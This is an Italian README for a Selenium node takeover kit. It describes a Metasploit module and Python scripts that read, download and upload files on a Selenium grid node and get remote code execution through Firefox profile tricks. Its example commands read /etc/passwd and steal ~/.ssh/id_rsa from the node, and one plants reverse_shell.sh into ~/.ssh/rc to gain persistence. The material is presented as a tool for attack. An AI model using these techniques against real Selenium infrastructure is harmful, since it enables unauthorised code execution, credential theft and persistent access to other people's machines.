
Una raccolta di test selenium che potrebbero agevolare il takeover di un nodo selenium
Questo progetto è stato spostato. Per ottenere l'ultima versione, esegui il pull da https://codeberg.org/JonStratton/selenium-node-takeover-kit
Questo combina alcuni degli esempi seguenti per caricare file su, scaricare file da, ed eseguire codice su un nodo Selenium (tramite il parametro “COMMAND_TYPE”). L'RCE attualmente funziona solo su Linux. Per installarlo, copia questo in "~/.msf4/modules/exploits/multi/http/" o dove preferisci.
Questo si limita a navigare all'URL "file:" e a scaricare il contenuto della pagina.
examples/selenium_node_cat.py -h http://selenium-hub.lan:4444/wd/hub -r /etc/passwdQuesto usa HTML inline per creare un modulo inline con un input di caricamento file. Invia quindi un percorso di file locale in questo modulo. Il Java-script in questo modulo incorpora questo file codificato in base64 nella stessa pagina. Questo viene poi letto e decodificato dagli script e salvato in un file locale.
examples/selenium_node_download.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/id_rsa -l ./nodes_rsaCome gli script di Node Download, ma senza preoccuparsi di elaborare il file in Java-script. Se il file non esiste, lo script, la send_keys() genererà un'eccezione.
Solo Firefox. Usa un profilo Firefox (che è solo un file zip codificato in base64 incorporato in una richiesta API di Selenium) per creare un handler personalizzato (“application/sh” a /bin/sh in questo caso). Codifica quindi in base64 alcuni comandi shell e usa “data:” inline per passare comandi associati ad “application/sh”. Firefox creerà quindi un file temporaneo con i comandi e lo eseguirà con sh.
Solo Firefox. Usa un profilo Firefox per impostare una directory di download personalizzata e disattivare il prompt "Salva con nome". Quindi naviga verso HTML inline con un link "data:" incorporato che è il file codificato da caricare. Questo link viene quindi cliccato.
examples/selenium_node_upload.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/rc -l ./reverse_shell.shSolo Firefox. Usa un profilo Filefox, che non viene decompresso in modo sicuro, per scrivere un file nel file system del nodo.